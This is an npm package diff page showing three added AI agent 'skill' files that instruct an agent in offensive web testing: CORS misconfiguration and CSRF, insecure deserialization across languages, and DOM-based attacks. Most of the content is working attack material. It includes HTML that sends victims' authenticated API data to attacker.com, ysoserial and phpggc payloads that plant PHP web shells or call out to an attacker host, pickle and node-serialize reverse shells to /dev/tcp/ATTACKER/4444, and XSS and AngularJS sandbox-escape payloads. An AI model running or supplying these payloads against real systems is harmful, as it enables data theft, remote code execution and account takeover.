npm - rtexit-method - Versions diffs - 0.1.8 → 0.1.9 - Mend

rtexit-method 0.1.8 → 0.1.9

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (13) hide show

package/packaged-assets/.agents/skills/rt-cors-csrf/SKILL.md ADDED Viewed

@@ -0,0 +1,180 @@
+---
+name: rt-cors-csrf
+description: "CORS misconfiguration and CSRF attack skill for authorized engagements. CORS origin reflection exploitation, null origin bypass, subdomain-based CORS abuse, pre-flight bypass, CSRF token bypass techniques (referer validation, SameSite cookie bypass, token prediction), CSRF via content-type confusion, and login CSRF. Use when testing cross-origin resource sharing policies and cross-site request forgery protections."
+---
+# rt-cors-csrf — CORS Misconfiguration & CSRF
+## Overview
+**CORS misconfigurations** allow attacker origins to read responses from authenticated APIs — credentials, tokens, PII. **CSRF** tricks users into making unintended authenticated requests. Together they represent broken cross-origin controls, among the most common web vulnerabilities.
+---
+## Part 1 — CORS Misconfiguration
+### Phase 1 — Detection
+```bash
+# Test CORS headers
+curl -H "Origin: https://attacker.com" https://target.com/api/user -v 2>&1 | grep -i "access-control"
+# Vulnerable if:
+# Access-Control-Allow-Origin: https://attacker.com  ← reflects your origin
+# Access-Control-Allow-Credentials: true             ← with credentials!
+# Test variations
+for origin in "https://attacker.com" "null" "https://target.com.attacker.com" "https://attackertarget.com"; do
+    echo -n "$origin → "
+    curl -s -I -H "Origin: $origin" https://target.com/api/ | grep -i "access-control-allow-origin"
+done
+```
+### Phase 2 — Exploit Origin Reflection
+```html
+<!-- If Access-Control-Allow-Origin reflects any Origin + Allow-Credentials: true -->
+<!-- Host on attacker.com: -->
+<html><body>
+<script>
+fetch('https://target.com/api/user', {credentials: 'include'})
+    .then(r => r.json())
+    .then(data => {
+        // Send victim's data to attacker
+        fetch('https://attacker.com/collect', {
+            method: 'POST',
+            body: JSON.stringify(data)
+        });
+    });
+</script>
+</body></html>
+<!-- Victim visits attacker.com → their authenticated API response stolen -->
+```
+### Phase 3 — Null Origin Bypass
+```html
+<!-- Some apps whitelist "null" origin (sandboxed iframes send null) -->
+<iframe sandbox="allow-scripts allow-top-navigation allow-forms"
+        src="data:text/html,<script>
+fetch('https://target.com/api/sensitive', {credentials:'include'})
+    .then(r=>r.text())
+    .then(d=>location='https://attacker.com/?'+encodeURIComponent(d))
+</script>">
+</iframe>
+```
+### Phase 4 — Subdomain Bypass
+```bash
+# CORS regex: /.*target\.com$/ → matches evil.target.com
+# Find XSS on any subdomain → use it to make CORS request
+# Or: register subdomain-lookalike
+# Whitelist: *.target.com → register: attacker.target.com.evil.com? (no)
+# But if regex: /target\.com/ → matches: attackertarget.com
+# Test subdomain origin
+curl -H "Origin: https://evil.target.com" https://target.com/api/
+curl -H "Origin: https://target.com.evil.com" https://target.com/api/
+```
+---
+## Part 2 — CSRF
+### Phase 5 — CSRF Detection
+```bash
+# Check for CSRF token in state-changing requests
+# Capture POST/PUT/DELETE in Burp → look for _csrf, csrf_token, X-CSRF-Token header
+# Test 1: Remove CSRF token
+# If request succeeds without token → CSRF vulnerable
+# Test 2: Use another user's CSRF token
+# Log in as User A → get A's token → use in User B's request
+# If succeeds → token not tied to session → CSRF vulnerable
+# Test 3: Empty token
+# Change csrf_token=VALID to csrf_token=
+# If succeeds → validation flawed
+# Test 4: Referer-only validation
+curl -X POST https://target.com/change-password \
+  -b "session=VICTIM_SESSION" \
+  -d "new_password=hacked" \
+  --referer "https://target.com"  # Forge referer
+```
+### Phase 6 — CSRF Exploit
+```html
+<!-- Classic CSRF — change victim's email -->
+<html><body>
+<form id="csrf" action="https://target.com/account/update" method="POST">
+    <input name="email" value="attacker@evil.com">
+    <input name="action" value="update">
+</form>
+<script>document.getElementById('csrf').submit();</script>
+</body></html>
+<!-- JSON CSRF (Content-Type: text/plain → server accepts) -->
+<html><body>
+<form id="csrf" action="https://target.com/api/transfer" method="POST"
+      enctype="text/plain">
+    <input name='{"amount":1000,"to":"attacker","x":"' value='"}'>
+</form>
+<script>document.getElementById('csrf').submit();</script>
+</body></html>
+<!-- CSRF via fetch (if CORS allows null origin) -->
+<iframe sandbox="allow-scripts" src="data:text/html,<script>
+fetch('https://target.com/api/admin/delete', {
+    method:'POST',
+    credentials:'include',
+    body:'user_id=victim'
+})
+</script>">
+</iframe>
+```
+### Phase 7 — SameSite Cookie Bypass
+```bash
+# SameSite=Lax: cookies sent on top-level navigation GET requests
+# Bypass: use GET-based state-changing endpoint if exists
+# Test: does the action work via GET?
+curl "https://target.com/account/delete?confirm=true" \
+  -b "session=VICTIM_SESSION"
+# SameSite=None without Secure: works cross-site (flag misconfiguration)
+# SameSite not set (old default Lax): bypass via sibling subdomain + HTTPS redirect chain
+# Login CSRF — force victim to log into attacker account
+<form action="https://target.com/login" method="POST">
+    <input name="username" value="attacker_account">
+    <input name="password" value="attacker_password">
+</form>
+# Victim submits → now logged in as attacker → attacker reads victim's activity
+```
+---
+## Skill Levels
+**BEGINNER:** CORS header inspection · Basic CSRF with HTML form · Remove CSRF token test
+**INTERMEDIATE:** Origin reflection exploit · Null origin iframe CORS · JSON CSRF
+**ADVANCED:** Subdomain CORS bypass + XSS chaining · SameSite Lax bypass via GET state-change
+**EXPERT:** Pre-flight bypass via non-simple methods · CSRF token prediction · Login CSRF chains
+---
+## References
+- PortSwigger CORS: https://portswigger.net/web-security/cors
+- PortSwigger CSRF: https://portswigger.net/web-security/csrf
+- SameSite bypass research: https://portswigger.net/research/bypassing-samesite-cookie-restrictions

package/packaged-assets/.agents/skills/rt-deserialization/SKILL.md ADDED Viewed

@@ -0,0 +1,223 @@
+---
+name: rt-deserialization
+description: "Insecure deserialization master skill covering all major languages for authorized engagements. Java deserialization with ysoserial gadget chains, PHP object injection with phpggc, .NET ViewState and BinaryFormatter attacks, Python pickle RCE, Ruby Marshal deserialization, Node.js serialize-to-function, and identifying deserialization sinks across frameworks. Use when applications accept serialized objects from untrusted input."
+---
+# rt-deserialization — Insecure Deserialization (All Languages)
+## Overview
+Deserialization converts byte streams back into objects. When applications deserialize attacker-controlled data without validation, attackers can craft malicious serialized objects that trigger code execution via "gadget chains" — sequences of existing code that execute dangerous operations during deserialization.
+---
+## Phase 1 — Detection Across Languages
+```bash
+# Java serialization magic bytes
+# AC ED 00 05 = Java serialized object
+# rO0AB = base64 of AC ED 00 05
+echo "rO0ABXNy..." | base64 -d | xxd | head -2
+# PHP serialization format
+# O:4:"User":1:{s:4:"name";s:5:"admin";}
+# a:2:{s:5:"hello";s:5:"world";}
+# .NET BinaryFormatter
+# AAEAAAD///// = base64 marker
+# Content-Type: application/x-www-form-urlencoded with ViewState param
+# Python pickle
+# \x80\x04 = pickle protocol 4 magic bytes
+# Node.js (serialize-javascript, node-serialize)
+# {"rce":"_$$ND_FUNC$$_function(){return require('child_process').execSync('id')}()"}
+```
+---
+## Phase 2 — Java Deserialization
+```bash
+# ysoserial — Java gadget chain generator
+java -jar ysoserial.jar  # List available gadget chains
+# Most useful chains
+java -jar ysoserial.jar CommonsCollections6 'id' | base64 -w0
+java -jar ysoserial.jar CommonsCollections5 'curl http://ATTACKER/$(id)' | base64 -w0
+java -jar ysoserial.jar Spring1 'id' | base64 -w0
+java -jar ysoserial.jar Groovy1 'id' | base64 -w0
+# Test with curl — replace serialized value in cookie/header/body
+PAYLOAD=$(java -jar ysoserial.jar CommonsCollections6 'id' | base64 -w0)
+curl "https://target.com/api" \
+  -H "Authorization: $PAYLOAD"
+  # Or in cookie: -b "JSESSIONID=$PAYLOAD"
+  # Or POST body with base64 encoded payload
+# Blind RCE via DNS (confirm execution)
+java -jar ysoserial.jar CommonsCollections6 \
+  'curl http://BURP_COLLABORATOR.burpcollaborator.net' | base64 -w0
+# Identify gadget chain — check classpath
+# Look for: commons-collections, spring-core, groovy-all in pom.xml/build.gradle
+find /app -name "*.jar" | xargs -I{} jar tf {} | grep -i "commons\|spring"
+```
+---
+## Phase 3 — PHP Object Injection
+```bash
+# phpggc — PHP gadget chain generator (like ysoserial for PHP)
+git clone https://github.com/ambionics/phpggc
+php phpggc -l  # List gadget chains
+# Useful chains
+php phpggc Laravel/RCE1 system id | base64
+php phpggc Symfony/RCE4 exec 'id' | base64
+php phpggc Drupal/FD1 file_put_contents /var/www/html/shell.php '<?php system($_GET[c]);?>'
+php phpggc Guzzle/FW1 file_put_contents /var/www/html/shell.php '<?php system($_GET[c]);?>'
+# Manual PHP object injection
+# Find unserialize() calls with user input:
+# unserialize($_COOKIE['data'])
+# unserialize(base64_decode($_GET['obj']))
+# Craft malicious object (if __wakeup, __destruct, __toString with dangerous code)
+php -r "
+class VulnClass {
+    public \$cmd;
+    function __destruct() { system(\$this->cmd); }
+}
+\$o = new VulnClass();
+\$o->cmd = 'id';
+echo base64_encode(serialize(\$o));
+"
+# Phar deserialization (file operations trigger deserialization)
+php -r "
+\$phar = new Phar('evil.phar');
+\$phar->startBuffering();
+\$phar->addFromString('test.txt', 'test');
+\$phar->setMetadata(new VulnClass());
+\$phar->stopBuffering();
+"
+rename('evil.phar', 'evil.jpg')  # Rename to bypass extension check
+# Trigger: file_exists('phar://uploads/evil.jpg')
+```
+---
+## Phase 4 — Python Pickle RCE
+```python
+# Pickle deserialization = arbitrary code execution
+import pickle, base64, os
+class Exploit(object):
+    def __reduce__(self):
+        return (os.system, ('id',))
+# Generate payload
+payload = base64.b64encode(pickle.dumps(Exploit())).decode()
+print(f"Payload: {payload}")
+# Reverse shell payload
+class ReverseShell(object):
+    def __reduce__(self):
+        cmd = "bash -c 'bash -i >& /dev/tcp/ATTACKER/4444 0>&1'"
+        return (os.system, (cmd,))
+payload = base64.b64encode(pickle.dumps(ReverseShell())).decode()
+# Test if endpoint accepts pickle
+import requests
+r = requests.post("https://target.com/api/data",
+                  data={"data": payload})
+# Or in cookie, header, etc.
+```
+---
+## Phase 5 — .NET Deserialization
+```bash
+# ysoserial.net — .NET gadget chains
+ysoserial.net -f Json.Net -g ObjectDataProvider -c "calc.exe" -o base64
+ysoserial.net -f BinaryFormatter -g TypeConfuseDelegate -c "cmd /c whoami" -o base64
+ysoserial.net -f LosFormatter -g ActivitySurrogateSelectorFromFile -c "payload.cs" -o base64
+# ViewState deserialization (ASP.NET WebForms)
+# If MachineKey known/weak → forge ViewState with payload
+ysoserial.net -p ViewState -g TextFormattingRunProperties \
+  --decryptionalg="AES" --decryptionkey="KEY_FROM_WEB.CONFIG" \
+  --validationalg="SHA1" --validationkey="VKEY_FROM_WEB.CONFIG" \
+  -c "cmd /c whoami" -o base64
+# Locate MachineKey in web.config
+curl https://target.com/.git/config  # Maybe web.config exposed
+# Or: read via LFI/XXE
+```
+---
+## Phase 6 — Ruby Marshal Deserialization
+```ruby
+# Marshal.load with user input = RCE
+require 'base64'
+# Gadget chain for Ruby on Rails with universal_gadget
+# Tool: rails-deserialization-exploits
+# github.com/Ren0503/ruby-deserialization
+payload = Base64.encode64(Marshal.dump(
+  # Construct gadget chain here
+))
+# Test if endpoint accepts Marshal data
+# Look for: application/x-ruby-marshal content-type
+# Or: base64 strings starting with BAhb (Ruby Marshal magic)
+```
+---
+## Phase 7 — Node.js Deserialization
+```javascript
+// node-serialize vulnerable pattern
+var serialize = require('node-serialize');
+// Malicious serialized object with IIFE
+var payload = '{"rce":"_$$ND_FUNC$$_function(){return require(\'child_process\').execSync(\'id\').toString()}()"}';
+// Test: encode and send
+var encoded = Buffer.from(payload).toString('base64');
+// Send in cookie or POST body
+// Reverse shell
+var revshell = '{"rce":"_$$ND_FUNC$$_function(){require(\'child_process\').exec(\'bash -c \\\\\'bash -i >& /dev/tcp/ATTACKER/4444 0>&1\\\\\'\')}()"}';
+```
+---
+## Skill Levels
+**BEGINNER:** Identify serialization format (magic bytes) · ysoserial DNS callback confirmation · phpggc basic chain
+**INTERMEDIATE:** Java CommonsCollections chains · PHP phar deserialization · Python pickle RCE
+**ADVANCED:** .NET ViewState with known MachineKey · Ruby Rails gadget chains · Blind RCE confirmation via DNS
+**EXPERT:** Custom gadget chain development · Cross-language polyglot payloads · JNDI injection variants
+---
+## References
+- ysoserial: https://github.com/frohoff/ysoserial
+- phpggc: https://github.com/ambionics/phpggc
+- ysoserial.net: https://github.com/pwntester/ysoserial.net
+- OWASP Deserialization: https://owasp.org/www-community/vulnerabilities/Deserialization_of_untrusted_data
+- MITRE T1059: https://attack.mitre.org/techniques/T1059/

package/packaged-assets/.agents/skills/rt-dom-attacks/SKILL.md ADDED Viewed

@@ -0,0 +1,219 @@
+---
+name: rt-dom-attacks
+description: "DOM-based vulnerability skill for authorized engagements. DOM XSS via dangerous sinks (innerHTML, eval, document.write, location), DOM clobbering to bypass security checks, client-side template injection (AngularJS, Vue, React), postMessage exploitation, DOM-based open redirect, and web messaging attacks. Use when testing client-side JavaScript security in modern single-page applications."
+---
+# rt-dom-attacks — DOM-Based Vulnerabilities
+## Overview
+DOM-based vulnerabilities occur entirely client-side — the server sends safe data but the browser's JavaScript processes it unsafely. Traditional XSS scanners miss these. Sources (user-controlled input) flow into dangerous sinks (functions that execute code) through JavaScript execution paths.
+---
+## Phase 1 — DOM XSS Sources & Sinks
+```javascript
+// SOURCES (attacker-controlled inputs)
+location.href          // Full URL
+location.search        // Query string (?q=...)
+location.hash          // Fragment (#...)
+location.pathname      // URL path
+document.referrer      // Referrer header
+window.name            // Window name (survives navigation!)
+postMessage data       // Cross-origin messages
+localStorage/sessionStorage
+// SINKS (dangerous functions — cause XSS if tainted data flows in)
+// CODE EXECUTION sinks
+eval()
+setTimeout("STRING")    // String form — dangerous
+setInterval("STRING")
+new Function("STRING")
+document.write()
+document.writeln()
+// HTML INJECTION sinks
+element.innerHTML = TAINTED
+element.outerHTML = TAINTED
+element.insertAdjacentHTML()
+document.body.innerHTML
+// URL NAVIGATION sinks (can be javascript: protocol)
+location = TAINTED
+location.href = TAINTED
+location.assign(TAINTED)
+location.replace(TAINTED)
+// Script SRC sinks
+script.src = TAINTED
+```
+---
+## Phase 2 — DOM XSS Examples
+```javascript
+// URL fragment → innerHTML (common in SPA routing)
+// Source: location.hash
+// Sink: innerHTML
+// Vulnerable code: document.getElementById('content').innerHTML = location.hash.slice(1)
+// Exploit: https://target.com/#<img src=x onerror=alert(1)>
+// URL param → eval
+// Vulnerable: eval(new URLSearchParams(location.search).get('callback'))
+// Exploit: https://target.com/?callback=alert(document.cookie)
+// URL param → document.write
+// Vulnerable: document.write('<img src="' + getParam('img') + '">')
+// Exploit: https://target.com/?img=x" onerror="alert(1)
+// URL param → location (open redirect → XSS)
+// Vulnerable: location.href = getParam('redirect')
+// Exploit: https://target.com/?redirect=javascript:alert(1)
+// window.name XSS (survives cross-origin navigation)
+// Attacker page:
+window.name = "<img src=x onerror=alert(document.cookie)>"
+location = "https://target.com/vulnerable-page"
+// Target page uses: document.write(window.name)
+```
+---
+## Phase 3 — DOM Clobbering
+```html
+<!-- DOM clobbering: use HTML to override JavaScript variables/objects -->
+<!-- Overwrites window.x with a DOM element -->
+<a id="x">clobbered</a>
+<!-- Now: window.x = HTMLAnchorElement (not undefined) -->
+<!-- If code does: if(!x) { securityCheck() } → check bypassed -->
+<!-- Clobber security flag -->
+<form id="isAdmin"><input id="value" value="true"></form>
+<!-- If code: if(isAdmin.value === 'true') → bypassed -->
+<!-- Clobber URL used in script src -->
+<a id="config"><a id="config" name="scriptURL" href="//attacker.com/evil.js"></a>
+<!-- If code: script.src = config.scriptURL → loads attacker script -->
+<!-- Real attack: inject via stored XSS on subdomain, clobber parent -->
+<!-- Or: HTML injection without script execution (CSP bypass) -->
+```
+---
+## Phase 4 — Client-Side Template Injection (CSTI)
+```javascript
+// AngularJS CSTI → RCE in browser sandbox
+// If user input is placed inside ng-app context:
+// Test: {{7*7}} → if 49 appears → CSTI
+// AngularJS sandbox escape (old versions)
+{{constructor.constructor('alert(1)')()}}
+{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
+// AngularJS 1.x universal sandbox escape
+{{a=['constructor'][0];b=a.constructor;c=b('return window')();c.alert(c.document.cookie)}}
+// Vue.js CSTI
+// Test: {{7*7}}
+// {{constructor.constructor('alert(1)')()}}
+// $el.ownerDocument.defaultView.alert(1)
+// React: generally safe (JSX escapes) but dangerouslySetInnerHTML is a sink
+// Test for dangerouslySetInnerHTML in source → same as innerHTML
+// Angular (modern) — strict mode, harder to exploit
+// Look for: bypassSecurityTrustHtml(), sanitize bypass
+```
+---
+## Phase 5 — postMessage Exploitation
+```javascript
+// postMessage allows cross-origin communication
+// Vulnerable: doesn't validate origin of incoming messages
+// Vulnerable code:
+window.addEventListener("message", function(e) {
+    eval(e.data);  // No origin check!
+    // Or: document.getElementById("content").innerHTML = e.data
+});
+// Exploit from attacker.com:
+<script>
+var target = window.open("https://target.com/", "_blank");
+setTimeout(function() {
+    target.postMessage("<img src=x onerror=alert(document.cookie)>", "*");
+    // Or: target.postMessage("alert(1)", "*");
+}, 2000);
+</script>
+// Bypass origin check weaknesses
+// if (e.origin.indexOf("target.com") !== -1) ← bypass with: attacker.target.com
+// if (e.origin === "https://target.com")       ← strict (safe)
+// postMessage CSRF
+target.postMessage('{"action":"transfer","amount":1000,"to":"attacker"}', "*")
+```
+---
+## Phase 6 — DOM-Based Open Redirect
+```bash
+# DOM redirect used as XSS vector
+# Vulnerable: window.location = getParam('url')
+# XSS: ?url=javascript:alert(document.cookie)
+# Bypass common filters
+?url=javascript:alert(1)
+?url=JaVaScRiPt:alert(1)        # Case variation
+?url=javascript%3aalert(1)       # URL encoded colon
+?url=java%0ascript:alert(1)     # Newline injection
+?url=data:text/html,<script>alert(1)</script>
+?url=//attacker.com              # Protocol-relative
+```
+---
+## Automated DOM XSS Testing
+```bash
+# DOMXSSScanner
+pip3 install dalfox
+dalfox url "https://target.com/?q=test" --deep-domxss
+# DOM Invader (Burp Suite built-in)
+# Browser → Extensions → Burp Suite → DOM Invader
+# Injects canary string → tracks through DOM → finds sinks
+# Playwright-based DOM XSS scanner
+npm install -g js-xss-scanner
+js-xss-scanner https://target.com
+```
+---
+## Skill Levels
+**BEGINNER:** URL fragment/parameter to innerHTML · document.write XSS · Open redirect via location=
+**INTERMEDIATE:** DOM clobbering for security bypass · AngularJS CSTI sandbox escape · postMessage origin bypass
+**ADVANCED:** window.name persistence XSS · Vue.js CSTI · Complex source-to-sink tracing
+**EXPERT:** Custom DOM analysis tooling · React dangerouslySetInnerHTML chains · CSP bypass via DOM
+---
+## References
+- PortSwigger DOM XSS: https://portswigger.net/web-security/cross-site-scripting/dom-based
+- DOM Invader: https://portswigger.net/burp/documentation/desktop/tools/dom-invader
+- PortSwigger DOM Clobbering: https://portswigger.net/web-security/dom-based/dom-clobbering
+- Client-side PP gadgets: https://github.com/BlackFan/client-side-prototype-pollution